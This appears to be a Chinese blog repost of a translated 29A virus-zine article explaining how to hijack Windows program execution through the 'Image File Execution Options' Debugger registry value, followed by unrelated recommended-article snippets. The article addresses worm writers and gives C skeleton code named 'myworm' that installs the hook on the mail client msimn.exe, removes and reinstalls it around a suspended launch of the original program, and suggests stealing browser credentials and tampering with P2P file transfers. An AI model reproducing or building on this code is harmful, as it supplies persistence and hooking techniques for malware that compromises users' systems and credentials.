执行重定向 -- 通过使用'Image File Execution Options'键值

最新推荐文章于 2024-10-12 17:46:25 发布
最新推荐文章于 2024-10-12 17:46:25 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: 网络安全技术 文章标签: image file hook null dst windows

=============================================================
执行重定向 -- 通过使用'Image File Execution Options'键值
By GriYo/29A                 
29a-8.017                翻译于2005-7-9                 
=============================================================

我已经厌烦了蠕虫和其他的恶意代码仍然使用众所皆知,老掉牙并且过度使用的注册表键值,
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run 。

此处我将强调一种能产生很多乐趣的方法,只要加一些想像。

有这样一个注册表键值, 它可以让你重定向执行系统中其他执行文件。虽然这是一个众所皆知并且有文档记载的键值,
但是我并不记得有任何恶意代码使用它, 至少没有足够的想像力来引起我的注意。

着手工作, 跳转到键值
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options
在里面添加一个新键值,使用一个你想欺骗的执行文件的名字,好比NOTEPAD.EXE
 
注意到在‘Image File Execution Options’键值中已经有一些条目了,这些应用程序和填充大概是一些为了兼容老版本WINDOWS程序的东东。

现在给NOTEPAD.EXE键值加入一个新的串值类型的值项,名为‘Debugger’,并且键入其他执行程序的路径作为它的值。
所有的东西应该看起来这样:

Image File Execution Options
|
|__NOTEPAD.EXE
     Debugger - REG_SZ - C:/WINDOWS/SYSTEM32/CALC.EXE

一旦做好了,在NOTEPAD图标上单击?哪儿有,CALC.EXE被代替执行了,多有趣可笑呀,当你的姐姐试图执行MSN时,却得到了CALC.EXE...
但是我们将要试着超越它...

这儿有一个简单的命令行程序, TEST.C, 它可以显示执行时使用的参数。

----------------------------------------------------------------------
#include "stdio.h"
#include "conio.h"

int main( int argc, char **argv)
{
        int count ;

        printf( "Number of arguments: %d/n", argc) ;

        count = 0 ;

        while( count < argc)
        {
                printf( "Argument %d: %s/n", count, argv[ count]) ;
                count++ ;
        }

        while( !kbhit()) ;

        return 0 ;
}
----------------------------------------------------------------------

编译它并将test.exe放在你的根目录,C:/TEST.EXE。现在到注册表的NOTEPAD.EXE键值,修改'Debuuger'让它指向C:/TEST.EXE

在NOTEPAD图标上单击,看有TEST.EXE的输出结果

----------------------------------------------------------------------
Number of arguments: 2
Argument 0: c:/test.exe
Argument 1: C:/WINDOWS/system32/notepad.exe
----------------------------------------------------------------------

正如你所见的,原来程序的路径作为参数被传到了test.exe。现在在你的根目录创建一个README.TXT文件,并单击它。
如果NOTEPAD.EXE是你打开.txt文件默认程序,text.exe就会出现,显示如下的信息:

----------------------------------------------------------------------
Number of arguments: 3
Argument 0: c:/test.exe
Argument 1: C:/WINDOWS/system32/NOTEPAD.EXE
Argument 2: C:/readme.txt
----------------------------------------------------------------------

现在你可以看见传给NOTEPAD.EXE的参数也出现,作为传给test.exe的参数。
 
此刻我知道我能写一个能够代替NOTEPAD.EXE执行的程序了。这个程序接受argv[1]并执行它,并通过传入argv[2]或以上作为参数。
在这种情况下,要是你的程序没有显示任何窗口,用户就不会注意到它。

做了什么?你的程序将代替原来的程序被执行。在执行过程中,你的程序会执行原来的程序,使用特定的参数,并挂钩一些API或造成某种变化。
 
当你做这个的时候,要面对的一个问题是:你的程序(在这个例子中的test.exe)是否能够执行原来的程序(NOTEPAD.EXE)?

为什么?因为在‘Image File Execution Options’键值的重定向。当TEST.EXE使用CreatProcess的方法试图执行NOTEPAD.EXE时,
另一个TEST.EXE的实例会被代替执行,造成死循环。

你需要在Image File Execution Options下删除NOTEPAD.EXE的键值,执行原来的NOTEPAD.EXE,执行完后再将NOTEPAD.EXE键值写回。

你也不得不面对你自己制造的一些其他的小问题。 考虑下面没有完成的代码,作为一个起点:

----------------------------------------------------------------------
#include <windows.h>

#define WormName "myworm"
#define SubKey "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options//msimn.exe"
#define SIZEOF_SPOOF_CMDLINE 1024

#ifdef _DEBUG
void DbgOut( char *Text)
{
        MessageBox( NULL, Text, WormName, 0) ;
}
#endif

BOOL SetImgHook()
{
        char WormPath[ MAX_PATH] ;

        int Size ;
        HKEY hKey ;
        BOOL RetVal ;

        Size = GetModuleFileName( NULL, WormPath, MAX_PATH) ;

        RetVal = FALSE ;

        if( RegCreateKey(       HKEY_LOCAL_MACHINE,
                                SubKey,
                                &hKey) == ERROR_SUCCESS)
        {
                RetVal = ( RegSetValueEx(       hKey,
                                                "Debugger",
                                                0,
                                                REG_SZ,
                                                WormPath,
                                                Size) == ERROR_SUCCESS) ;

                RegCloseKey( hKey) ;
        }

        return RetVal ;
}

BOOL ClearImgHook()
{
        return( RegDeleteKey(   KEY_LOCAL_MACHINE,
                                SubKey) == ERROR_SUCCESS) ;
}

int WinMain(    HINSTANCE hInstance,
                HINSTANCE hPrevInstance,
                LPSTR lpCmdLine,
                int nCmdShow)
{
        STARTUPINFO si ;
        PROCESS_INFORMATION pi ;

        char SpoofCmdLine[ SIZEOF_SPOOF_CMDLINE] ;
        char *Src ;
        char *Dst ;

        #ifdef _DEBUG
        if( ClearImgHook()) DbgOut( "App hook removed") ;
        else DbgOut( "Error! Cant remove app hook") ;
        #else
        ClearImgHook() ;
        #endif

        GetStartupInfo( &si) ;

        Src = lpCmdLine ;
        Dst = SpoofCmdLine ;

        while( *Src != '/0')
        {
                if( *Src != '/"')
                {
                        *Dst = *Src ;
                        Dst++ ;
                }

                Src++ ;
        }

        *Dst = '/0' ;

        if( CreateProcess(      SpoofCmdLine,
                                NULL,
                                NULL,
                                NULL,
                                FALSE,
                                REATE_NEW_PROCESS_GROUP|CREATE_SUSPENDED,
                                NULL,
                                NULL,
                                &si,
                                &pi))
        {
                #ifdef _DEBUG
                DbgOut( "Original app executed successfully") ;
                #endif

                //
                // Place hooks over original executable now
                //

                ResumeThread( pi.hThread) ;
                WaitForSingleObject( pi.hProcess, INFINITE) ;

                #ifdef _DEBUG
                DbgOut( "Original app closed") ;
                #endif
        }
        #ifdef _DEBUG
        else
        {
                DbgOut( "Error! Unable to execute original app") ;
        }
        #endif

        #ifdef _DEBUG
        if( SetImgHook()) DbgOut( "App hook reinstalled") ;
        else DbgOut( "Error! Cant reinstall app hook") ;
        #else
        SetImgHook() ;
        #endif

        return 0 ;
}
----------------------------------------------------------------------

这就是我所想的:
 
* 我不必使用每个蠕虫都已经使用的同一个垃圾似的注册表键值。

* 在内存中修改/挂钩原始程序作为一些变化,当执行时不用担心WINDOWS文件保护。

最后,决定你将要玩弄的程序。一些想法:

* INTERNET EXPLORER

通过给IEXPLORER.EXE或者它的DLL放置内存钩子,你可以截获认证,访问过的URL 或者发动你发明的任何中间人攻击。

* 邮件客户端
 
这儿没什么好说的?发挥自己的想像力,但是请不要写愚蠢的大量邮件废物,只能感染那些执行他们收到所有东西的傻瓜。
如果你创建什么,创建一些新的东西要比展示WINDOWS用户的愚蠢多得多。

* WINDOWS 资源管理器

你的程序能够得到由EXPLORER.EXE所能做一切的全部访问权,很有创造性。

* P2P

Mmmm?让我们指出下面的情形;你的程序代替某些P2P软件接管控制,在它上放置钩子并运行原始程序。
当远程用户申请某个文件,你的程序加一些东西到那个文件中,传给P2P程序发送,之后再将文件恢复原状。

这就是全部,编程快乐,享受创意!:-)
 

linkboy2004
关注
专栏目录
[Spark版本更新]--2.3.0发行说明
欢迎来到我的博客,一起探索代码里的世界!
03-03 1万+
自从2017年12月1日发布spark-2.2.1以来,已有3个月时间。2018年2月28日,spark官方发布了一个大版本Spark-2.3.0,解决了1399个大大小小的问题。一、DataBricks做了相关说明今天,我们很高兴地宣布Databricks上的Apache Spark 2.3.0作为其Databricks Runtime 4.0的一部分。我们要感谢Apache Spark社区为S...
Windows学习总结(12)——Windows 10系统开始运行-cmd命令大全
科技D人生
12-23 7836
gpedit.msc-----组策略                 sndrec32-------录音机 Nslookup-------IP地址侦测器              explorer-------打开资源管理器 logoff---------注销命令                tsshutdn-------60秒倒计时关机命令 lusrmgr.msc----本机
注册表 Image File Execution Options 项的作用及使用办法
fogeater的专栏
05-09 7877
<br />  Image File Execution Options<br />   跳转到键值<br />   HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options<br />   在里面添加一个新键值使用一个你想欺骗的执行文件的名字,好比notepad.exe <br /><br />   注意到在‘Image File Execution Optio
office 2010 安装时弹错误框 Error 1406 Image File Execution Options 不能写入
huiguixian的专栏
07-03 2156
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options<br />office 2010 发布 RTM了, 好多人开始安装了, 于是 一部分人发现安装过程中弹错误框Error 1406 Image File Execution Options 不能写入<br />原因:<br />1. 很多精简版本的XP 直接去掉了 administrators 对此键值的读写权限.<br />
Microsoft Application Verifier安装过程中(遇到注册表Image File Execution Options项无权限)的问题解决
Amy Lin的专栏
03-14 4980
Application Verifier是一个微软发布的一个代码验证工具。通过这个工具,可以找出在正常程序代码检测中难以察觉的错误。为我们检测内存错误,内存泄露,GID对象泄露提供帮助,并报告出问题的调用堆栈。对有过在大规模代码里查找内存,GDI泄露经历的同学,应该知道,这个调用堆栈信息的价值。。。。。惭愧的是,偶做了近4年的开发,才知道,微软有这么好用的的东东。。。。。关于工具的使用,偶也是
Image File Execution Options作用(加载调试器)
ly402609921的专栏
07-06 3745
Image File Execution Options  跳转到键值  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options  在里面添加一个新键
映像劫持(Image File Execution Options)的解决方案
weixin_34318326的博客
12-09 2023
这几天一直想要把这个经验写一下,总没抽出时间,晚上加加班。样本已经被杀毒U盘的监控干掉,本文回忆下修复过程。 现象: 一媒体朋友的笔记本染毒,杀毒软件起不来。开机就弹出若干个窗口,总也关不掉,直到系统内存耗尽死机,安全模式也是同样的现象。无奈之下,尝试重装系统,不过,因为不少人都知道的原因 ,她只是格式化了C分区,系统重装后,访问其它分区后,再次出现重装前的中毒症状。...
映像劫持 Image Hijack
KAKA的博客
07-06 1163
“映像劫持” —— IFEO(Image File Execution Options:映像文件执行参数),其实应该被称为 “Image Hijack” 原理 原理请看 tombkeeper 的所表: Windows NT系统在执行一个从命令行调用的可执行文件运行请求时,首先会检查这是否是一个可执行文件,如果是,又是什么格式的,然后就会检查是否存在: [HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Option
映像劫持-----程序重定向
oldmtn的专栏
04-01 792
有关HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options 映像劫持的示例代码~~~~   代码如下 #include #include using namespace std; void  main() {       TCHAR  Sub
映像劫持原理
liu4584945的专栏
03-11 1204
<br />windows映像劫持技术(IFEO)<br /><br />  基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把它放在哪个位置,或者是一个程序重新用安装盘修复过,都出现无法运行的情况,或是出错提示为“找不到文件”或者直接没有运行起来的反应,或者是比如运行程序A却成了执行B(可能是病毒),而改名后却可以正常运行的现象。<br />  遭遇流行“映像劫持”病毒的系统表现为常见的杀毒软件、防火墙、安全检测工具等均提示“找不到文件”或执行了没有反应,于是大部分用户只能去重装系统了,但是有经
Find-Sec-Bugs 漏洞范例
热门推荐
zhaohonghan的博客
04-03 1万+
Find-Sec-Bugs 漏洞范例 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
win8 无法显示桌面,运行explorer.exe 提示 0xc0000018 异常 解决办法
weixin_34419321的博客
01-08 256
win8 无法显示桌面,运行explorer.exe 提示 0xc0000018 错误 解决方法改注册表.这个就是DB03.EXE引起的. cmd打开注册表:regedit找到注册表"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Explorer.exe"项,...
解除映像劫持工具与源码,可解决因映像劫持导致的程序不能运行问题
kwan1的专栏
02-21 933
显示在红色列表框中为被劫持导致无法运行的程序名(同名程序不能在本机器上正常运行,可通过加号增加对其它程序文件的屏蔽) 显示在绿色列表框中为本软件解除了劫持的程序(可使用重新屏蔽按钮恢复到被劫持状态) 需要管理员权限运行(若权限自动申请如无效,可在资源管理中本程序图标上右键--使用管理员权限运行尝试解决) 操作后可直接关闭本程序,操作效果可保持(重启后不失效) 实现方法: ...
力扣21~30题
SM_zeng的博客
10-10 938
我发现我都注释没怎么写过,导致写得时候思路没有特别清晰,所以要开始写注释了。
智能指针(2)
2301_80377335的博客
10-09 993
照成这种原因的本质就是引用计数的正常增加导致内部循环的部分无法释放,所以解决问题的关键计数使得内部循环引用的部分的引用计数不会增加就可以了,这时weak_ptr不会增加引用计数的优势就体现了,只需要将链表内部循环的部分的管理的智能指针换成weak_ptr就可以了。shared_ptr是不会出现引用失效的,因为它的引用计数是会变的,但是这里如果引用的是一个空的对象,也就是说shared_ptr为nullptr,那这里的引用计数就需要特殊处理的,实际是给0的,因为引用空的根本不需要管理。所以还是带上比较好。
Stream流
m0_68319667的博客
10-12 969
一旦定义了一个流,就可以在一个表达式中链接多个操作,形成一个处理管道。提供了更简洁的语法,但在某些情况下,传统的循环可能更快。:流的操作可能会抛出异常,特别是在使用自定义函数作为参数时。是 Java 8 引入的一个重要特性,它是对集合数据进行操作的一种新的方式。:并行流在多线程环境中运行,因此需要考虑线程安全问题,尤其是在使用共享资源时。方法调用完毕后返回的不在是一个流的对象, 不能继续在使用Stream的功能。方法调用完毕后返回的依然是一个流的对象, 可以继续使用Stream的功能。
Python基础知识练习题详解
m0_73723097的博客
10-11 1141
CA)remove()#这个方法用于删除列表中的第一个匹配到的指定值。它不接受索引,也不返回被删除的元素,而是返回None(如果没有找到要删除的值,则抛出ValueErrorB)del()#这是一个语句,而不是一个方法。它用于通过索引删除列表中的元素。虽然它可以删除最后一个元素(通过),但它不返回被删除的元素。C)pop()#这个方法用于删除列表中的最后一个元素(或者通过指定索引删除其他位置的元素),并返回被删除的元素。这是删除并返回列表最后一个元素的正确方法。D)clear()
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options中创建VALORANT.exe项
最新发布
10-14
要在`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options`注册表路径下为`VALORANT.exe`创建一项,你需要确保你有适当的管理员权限,然后可以使用命令提示符进行操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值